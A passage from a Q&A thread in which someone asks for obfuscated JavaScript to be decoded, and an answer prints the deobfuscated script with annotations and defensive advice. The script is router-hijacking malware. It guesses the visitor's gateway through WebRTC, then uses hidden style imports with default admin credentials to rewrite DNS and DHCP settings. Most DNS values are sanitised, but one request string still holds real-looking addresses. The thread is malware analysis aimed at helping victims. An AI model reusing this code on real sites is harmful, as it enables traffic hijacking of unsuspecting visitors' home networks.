
Decrypt Javascript Obfuscator

This code has been encrypted by an obfuscator. I need it decrypted. Is anyone able to do it?

Here is part of code:

eval((function(){var w=[85,87,60,76,66,82,86,89,94,90,74,81,79,75,71,65,80,88,72,70];var a=[];for(var z=0;z<w.length;z++)a[w[z]]=z+1;var h=[];for(var f=0;f<arguments.length;f++){var c=arguments[f].split('~')


Also, here is the link to JSFiddle

Answer

Here's a formatted version of the code that gets eval'd, with the bad IP addresses removed* (you can get the source yourself by replacing that first eval with console.log; do that in an isolated environment, since the decoding wrapper still executes). Based on the symbol names, I believe this script attempts to use style tags and/or WebRTC to hack visitors' local routers and reconfigure their DNS settings. This is most likely done to route a victim's traffic through malicious servers in order to serve more malware and/or spy on their internet traffic.

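You should get rid of this code and check that your router has not been compromised: look at its DNS and DHCP settings, which are what the request strings below try to change, and replace any default admin password. You should also warn your users, if you have any.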

// String lookup table emitted by the obfuscator. The rest of the script never
// names a property or payload fragment directly; it reads them from here as
// _$_2a49[index]. Index map (0-based):
//   0-25           member names (RTCPeerConnection, Object, String, console)
//                  and the tokens used to parse SDP text
//   26             gateway address used when no RTCPeerConnection is available
//   27, 33, 38, 40 opening halves of a <style>@import url(http://USER[:PASS]@
//                  tag, one per credential set (four sets in total)
//   29             "write", i.e. document.write
//   28, 30-32, 34-37, 39, 41, 42
//                  closing halves: router admin paths whose query strings set
//                  DNS, DHCP or WAN fields
// NOTE(review): the setup_dns.exe entry (index 32) still carries two addresses
// as per-octet dns1_* / dns2_* fields, so not every DNS value in this listing
// is the 0.0.0.0 placeholder. Treat those octets as indicators from the
// sample, not as sanitised values.
var _$_2a49 = [
    "webkitRTCPeerConnection",
    "mozRTCPeerConnection",
    "",
    "createDataChannel",
    "onicecandidate",
    "candidate",
    "a=",
    "sdp",
    "setLocalDescription",
    "offer failed",
    "warn",
    "createOffer",
    "create",
    "0.0.0.0",
    "filter",
    "keys",
    ".",
    "split",
    ".1",
    "a=candidate",
    "indexOf",
    " ",
    "host",
    "c=",
    "forEach",
    "\r\n",
    "192.168.0.1",
    "<style type=\"text/css\">@import url(http://admin:gvt12345@",
    "/dnscfg.cgi?dnsPrimary=0.0.0.0&dnsSecondary=0.0.0.0&dnsDynamic=0&dnsRefresh=1);</style>",
    "write",
    "/dnsProxy.cmd?enblDproxy=0&PrimaryDNS=0.0.0.0&SecondaryDNS=0.0.0.0);</style>",
    "/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.82&Lease=120&gateway=0.0.0.0&domain=&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6);</style>",
    "/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1=23&dns1_2=95&dns1_3=57&dns1_4=74&dns2_1=192&dns2_2=3&dns2_3=182&dns2_4=146);</style>",
    "<style type=\"text/css\">@import url(http://admin:admin@",
    "/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&hostName=TLINK&Save=Save);</style>",
    "/start_apply.htm?dnsserver=0.0.0.0);</style>",
    "/wan_poe.cgi?dns1=0.0.0.0);</style>",
    "/setup.cgi?todo=wan_dns1=0.0.0.0);</style>",
    "<style type=\"text/css\">@import url(http://admin@",
    "/prim.htm?_scb=0&_ccb=0&N00010003=0x00&_cce=0x80010008&_ccb=0x80010009&S00035002=&N001E000D=&_cce=0x80010009&_ccb=0x80010009&_start_0000=&I00110001=&I00110002=&I00110003=&I00110004=&I00110005=&N00110009=1500&_start_0100=&I00035007=0.0.0.0&I00035008=0.0.0.0&N00035009=1500&_sce=%Nsc0&B0001000F=&_sce=%Nsc1&N0003500E=1&S00040100=&S00040200=&_S00040200=&S00040600=&I00040300=&I00040700=&I00040800=&N00040A00=1492&N00040912=1&N00050E00=1&I00050300=&I00050400=&I00050500=&S00050600=&S00050100=&S00050200=&_S00050200=&N00050911=1&N00060E00=1&I00060300=&I00060400=&I00060500=&S00060600=&S00060100=&S00060200=&_S00060200=&N00060002=1&N001E0015=2&N001E002B=0&S00201200=vivo&S001E0001=vivo&S001E0002=*****&_S001E0002=*****&S001E0005=*99#&N001E000F=1&S001E0003=zap.vivo.com.br&S001E0004=&N001E0032=1&I001E0008=&I001E0009=&N001E0010=0&N001E0020=&N001E0090=0&N001E0017=&_end_0500=&_cce=0x80010009&_sce=%Ssc);</style>",
    "<style type=\"text/css\">@import url(http://admin:password@",
    "/dnscfg.cgi?dnsPrimary=0.0.0.0&dnsSecondary=0.0.0.0&dnsDynamic=0&dnsRefresh=1);</style>",
    "/start_apply.htm?dnsserver=0.0.0.0&dnsserver2=0.0.0.0);</style>"
];
// Entry point of the sample. It picks a gateway address for catga() in one of
// two ways: from addresses found in the browser's own WebRTC offer / ICE
// candidates, or, when no prefixed RTCPeerConnection exists, from the fixed
// fallback "192.168.0.1".
// Resolves to window.webkitRTCPeerConnection || window.mozRTCPeerConnection.
var RTCPeerConnection = window[_$_2a49[0]] || window[_$_2a49[1]];
if (RTCPeerConnection) {
    (function() {
        // Empty iceServers list: no STUN/TURN server is configured here.
        var c = new RTCPeerConnection({
            iceServers: []
        });
        // "1 ||" makes this condition always true, so createDataChannel("")
        // is always called.
        if (1 || window[_$_2a49[1]]) {
            c[_$_2a49[3]](_$_2a49[2], {
                reliable: false
            })
        };
        // onicecandidate: pass "a=" + e.candidate.candidate to the parser b().
        c[_$_2a49[4]] = function(e) {
            if (e[_$_2a49[5]]) {
                b(_$_2a49[6] + e[_$_2a49[5]][_$_2a49[5]])
            }
        };
        // createOffer(success, failure): on success the offer's sdp text is
        // parsed by b() and then installed with setLocalDescription; on failure
        // console.warn("offer failed", g) is the only action.
        c[_$_2a49[11]](function(f) {
            b(f[_$_2a49[7]]);
            c[_$_2a49[8]](f)
        }, function(g) {
            console[_$_2a49[10]](_$_2a49[9], g)
        });
        // Prototype-less object (Object.create(null)) used as the set of
        // addresses seen so far. "0.0.0.0" is pre-seeded as false, so it is
        // already "in a" and never stored as true.
        var a = Object[_$_2a49[12]](null);
        a[_$_2a49[13]] = false;

        // d(p): record a newly seen address, then call catga() with a gateway
        // guess. The guess is built from the FIRST key whose value is true
        // (n[0]): its first three dot-separated parts followed by ".1". d() is
        // hoisted, so b() can call it even though it is declared further down.
        // Every previously unseen address triggers another catga() call.
        function d(p) {
            if (p in a) {
                return
            } else {
                a[p] = true
            };
            var n = Object[_$_2a49[15]](a)[_$_2a49[14]](function(q) {
                return a[q]
            });
            var o = n[0][_$_2a49[17]](_$_2a49[16]);
            var patcga = o[0] + _$_2a49[16] + o[1] + _$_2a49[16] + o[2] + _$_2a49[18];
            catga(patcga)
        }
        // b(i): split the text on "\r\n" and inspect each line.
        //  - a line containing "a=candidate" is split on spaces; field 7 is
        //    compared with "host" and field 4 is handed to d() on a match
        //    (presumably the candidate type and address of an ICE candidate
        //    line; confirm against the SDP grammar)
        //  - otherwise a line containing "c=" is split on spaces and field 2
        //    is handed to d()
        // ~indexOf(...) is truthy exactly when the substring is present.
        // The local array h is never used.
        function b(i) {
            var h = [];
            i[_$_2a49[17]](_$_2a49[25])[_$_2a49[24]](function(k) {
                if (~k[_$_2a49[20]](_$_2a49[19])) {
                    var l = k[_$_2a49[17]](_$_2a49[21]),
                        j = l[4],
                        m = l[7];
                    if (m === _$_2a49[22]) {
                        d(j)
                    }
                } else {
                    if (~k[_$_2a49[20]](_$_2a49[23])) {
                        var l = k[_$_2a49[17]](_$_2a49[21]),
                            j = l[2];
                        d(j)
                    }
                }
            })
        }
    })()
} else {
    // No prefixed RTCPeerConnection: use the fixed address "192.168.0.1".
    var patcga = _$_2a49[26];
    catga(patcga)
};

/**
 * Writes 17 <style> elements into the document with document.write. Each one
 * holds an @import url(http://USER[:PASS]@<patcga><path>) rule assembled from
 * a credential prefix (table indexes 27, 33, 38, 40), the address in patcga,
 * and an admin path with settings in its query string (indexes 28, 30-32,
 * 34-37, 39, 41, 42).
 *
 * What this means for a defender: the requests are issued by the visitor's
 * own browser towards the address in patcga, so they are forged configuration
 * requests against a router admin interface and only succeed where one of the
 * four hard-coded credential sets is still valid. Replacing default router
 * credentials and checking the router's DNS / DHCP settings are the relevant
 * checks.
 * NOTE(review): whether a given browser still sends subresource requests
 * whose URL embeds credentials is not shown here; confirm per browser.
 *
 * @param {string} patcga Host part inserted between the credential prefix and
 *     the admin path; it is concatenated into the markup without escaping.
 */
function catga(patcga) {
    // Prefix 27 ("admin:gvt12345@") with paths 28, 30, 31, 32.
    document[_$_2a49[29]](_$_2a49[27] + patcga + _$_2a49[28]);
    document[_$_2a49[29]](_$_2a49[27] + patcga + _$_2a49[30]);
    document[_$_2a49[29]](_$_2a49[27] + patcga + _$_2a49[31]);
    document[_$_2a49[29]](_$_2a49[27] + patcga + _$_2a49[32]);
    // Prefix 33 ("admin:admin@") with paths 28, 34, 35, 30, 36, 37.
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[28]);
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[34]);
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[35]);
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[30]);
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[36]);
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[37]);
    // Path 39 (/prim.htm) is tried with prefix 38 ("admin@", no password) and
    // again with prefix 33.
    document[_$_2a49[29]](_$_2a49[38] + patcga + _$_2a49[39]);
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[39]);
    // Prefix 40 ("admin:password@") with paths 41, 34, 42, 37, 36.
    document[_$_2a49[29]](_$_2a49[40] + patcga + _$_2a49[41]);
    document[_$_2a49[29]](_$_2a49[40] + patcga + _$_2a49[34]);
    document[_$_2a49[29]](_$_2a49[40] + patcga + _$_2a49[42]);
    document[_$_2a49[29]](_$_2a49[40] + patcga + _$_2a49[37]);
    document[_$_2a49[29]](_$_2a49[40] + patcga + _$_2a49[36])
}

*Note: I've replaced the bad DNS IP addresses with 0.0.0.0 to protect anyone who might try to run this code. If you want to see them, perhaps to go after them or blacklist them, they are in the revision history for this answer.